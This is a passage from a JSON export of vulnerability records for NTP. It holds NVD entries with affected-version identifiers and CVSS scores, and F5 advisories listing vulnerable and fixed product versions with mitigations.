"cpe:/a:ntp:ntp:4.3.9", "cpe:/a:ntp:ntp:4.3.65", "cpe:/a:ntp:ntp:4.3.77", "cpe:/a:ntp:ntp:4.3.60", "cpe:/a:ntp:ntp:4.3.38", "cpe:/a:ntp:ntp:4.3.30", "cpe:/a:ntp:ntp:4.3.56", "cpe:/o:opensuse:opensuse:13.2", "cpe:/a:ntp:ntp:4.3.53", "cpe:/a:ntp:ntp:4.3.64", "cpe:/a:ntp:ntp:4.3.15", "cpe:/a:ntp:ntp:4.3.46", "cpe:/a:ntp:ntp:4.3.57", "cpe:/a:ntp:ntp:4.3.59", "cpe:/a:ntp:ntp:4.3.58", "cpe:/a:ntp:ntp:4.3.87", "cpe:/a:ntp:ntp:4.3.12", "cpe:/a:ntp:ntp:4.3.62", "cpe:/a:ntp:ntp:4.3.6", "cpe:/a:ntp:ntp:4.3.66", "cpe:/a:ntp:ntp:4.3.32", "cpe:/a:ntp:ntp:4.3.86", "cpe:/a:ntp:ntp:4.3.2", "cpe:/o:opensuse:leap:42.1", "cpe:/a:ntp:ntp:4.3.80", "cpe:/a:ntp:ntp:4.3.63", "cpe:/a:ntp:ntp:4.3.21", "cpe:/a:ntp:ntp:4.3.82", "cpe:/a:ntp:ntp:4.3.5", "cpe:/a:ntp:ntp:4.3.89", "cpe:/a:ntp:ntp:4.3.14", "cpe:/o:suse:linux_enterprise_server:12", "cpe:/a:ntp:ntp:4.3.8", "cpe:/a:ntp:ntp:4.3.7", "cpe:/o:novell:suse_openstack_cloud:5", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/a:ntp:ntp:4.3.43", "cpe:/a:suse:manager:2.1", "cpe:/a:ntp:ntp:4.3.47", "cpe:/a:ntp:ntp:4.3.48", "cpe:/a:ntp:ntp:4.3.73", "cpe:/a:ntp:ntp:4.3.16", "cpe:/a:ntp:ntp:4.3.70", "cpe:/a:ntp:ntp:4.3.26", "cpe:/a:ntp:ntp:4.3.50", "cpe:/a:ntp:ntp:4.3.27", "cpe:/a:ntp:ntp:4.3.39", "cpe:/a:ntp:ntp:4.1.2", "cpe:/a:ntp:ntp:4.3.42", "cpe:/a:ntp:ntp:4.3.85", "cpe:/a:ntp:ntp:4.3.68", "cpe:/a:ntp:ntp:4.3.88", "cpe:/a:ntp:ntp:4.3.71", "cpe:/a:ntp:ntp:4.3.35"], "id": "CVE-2015-7976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7976", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.3.24:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.38:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.84:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.50:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.36:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.52:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.39:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.67:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:12:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.89:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.62:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.87:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.73:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_openstack_cloud:5:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.83:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.47:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.69:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.37:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.80:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.70:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.35:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.46:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.79:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.51:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.56:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.68:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.77:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.65:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.76:*:*:*:*:*:*:*", "cpe:2.3:a:suse:manager:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.48:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.75:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.59:*:*:*:*:*:*:*", "cpe:2.3:a:suse:manager_proxy:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.57:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:ltss:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.33:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.44:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.72:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.55:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.53:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.42:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.58:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.45:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.43:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.66:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.64:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.40:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.74:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.86:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.85:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.61:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.60:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.71:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.54:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.78:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.41:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.81:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.82:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.49:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.63:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.3.88:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}, {"lastseen": "2020-12-09T20:25:46", "description": "The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the \"other side\" of an interleaved association causing the victim ntpd to reset its association.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7185", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7185"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:netapp:hci:-", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:solidfire:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-7185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7185", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:03:01", "description": "The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 4.x before 4.2.8p2 requires a correct MAC only if the MAC field has a nonzero length, which makes it easier for man-in-the-middle attackers to spoof packets by omitting the MAC.", "edition": 5, "cvss3": {}, "published": "2015-04-08T10:59:00", "title": "CVE-2015-1798", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.2, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.8, "vectorString": "AV:A/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1798"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:ntp:ntp:4.2.7p444"], "id": "CVE-2015-1798", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1798", "cvss": {"score": 1.8, "vector": "AV:A/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.7p444:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-02-20T21:07:33", "bulletinFamily": "software", "cvelist": ["CVE-2015-7850"], "description": "\nF5 Product Development has assigned ID 554841 (BIG-IP), ID 555233 (BIG-IQ), ID 555235 (Enterprise Manager), and ID 507785 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<https://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H553914-6 on the **Diagnostics** >** Identified **> **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP AAM| 12.0.0 \n11.4.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP AFM| 12.0.0 \n11.3.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP Analytics| 12.0.0 \n11.0.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP APM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP ASM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP DNS| 12.0.0| 12.1.0| Low| ntpd \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 11.6.1| Low| ntpd \nBIG-IP Link Controller| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP PEM| 12.0.0 \n11.3.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nARX| 6.0.0 - 6.4.0| None| Low| ntpd \nEnterprise Manager| 3.0.0 - 3.1.1 HF5| 3.1.1 HF6| Low| ntpd \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ntpd \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ntpd \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ntpd \nBIG-IQ ADC| 4.5.0| None| Low| ntpd \nBIG-IQ Centralized Management| 4.6.0| 5.0.0| Low| ntpd \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| ntpd \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nA default configuration for the F5 products listed as vulnerable does not expose this vulnerability. To mitigate this vulnerability, do not enable remote configuration of NTP, and restrict access to NTP services (UDP port 123) on the management and self IP addresses.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2017-09-21T21:33:00", "published": "2015-11-03T00:23:00", "id": "F5:K17528", "href": "https://support.f5.com/csp/article/K17528", "title": "NTP vulnerability CVE-2015-7850", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-21T22:00:54", "bulletinFamily": "software", "cvelist": ["CVE-2015-7853"], "edition": 1, "description": "\nF5 Product Development has assigned ID 554839 (BIG-IP), ID 555233 (BIG-IQ), and ID 555235 (Enterprise Manager) to this vulnerability and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<https://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H553914-3 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP AAM| 12.0.0 \n11.4.0 - 11.6.0| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP AFM| 12.0.0 \n11.3.0 - 11.6.0| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP Analytics| 12.0.0 \n11.0.0 - 11.6.0| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP APM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP ASM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP DNS| 12.0.0| 12.1.0| Low| **ntpd** \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| **ntpd** \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 11.6.1| Low| **ntpd** \nBIG-IP Link Controller| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP PEM| 12.0.0 \n11.3.0 - 11.6.0| 12.1.0 \n11.6.1| Low| **ntpd** \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| **ntpd** \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| **ntpd** \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| **ntpd** \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1 HF5| 3.1.1 HF6| Low| **ntpd** \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| **ntpd** \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| **ntpd** \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| **ntpd** \nBIG-IQ ADC| 4.5.0| None| Low| **ntpd** \nBIG-IQ Centralized Management| 4.6.0| 5.0.0| Low| **ntpd** \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| **ntpd** \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| **ntpd**\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2017-09-21T21:27:00", "published": "2015-11-03T00:26:00", "href": "https://support.f5.com/csp/article/K17525", "id": "F5:K17525", "title": "NTP vulnerability CVE-2015-7853", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-21T23:59:25", "bulletinFamily": "software", "cvelist": ["CVE-2015-7705"], "edition": 1, "description": "\nF5 Product Development has assigned ID 554847 (BIG-IP), ID 555233 (BIG-IQ), and ID 555235 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H17527 on the **Diagnostics** > **Identified** > **Low** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP AAM| 12.0.0 \n11.4.0 - 11.6.0| None| Low| ntpd \nBIG-IP AFM| 12.0.0 \n11.3.0 - 11.6.0| None| Low| ntpd \nBIG-IP Analytics| 12.0.0 \n11.0.0 - 11.6.0| None| Low| ntpd \nBIG-IP APM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP ASM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP DNS| 12.0.0| None| Low| ntpd \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP Link Controller| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP PEM| 12.0.0 \n11.3.0 - 11.6.0| None| Low| ntpd \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1 HF5| 3.1.1 HF6| Low| ntpd \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ntpd \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ntpd \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ntpd \nBIG-IQ ADC| 4.5.0| None| Low| ntpd \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation \n\nTo mitigate this vulnerability, you should limit access to the management and self IP ports and limit login access to trusted users. For more information, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>). While there is no exposure to F5 products in the default configuration, control plane exposure may be introduced if the system is configured as an NTP server with rate limiting. The data plane is not vulnerable.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated 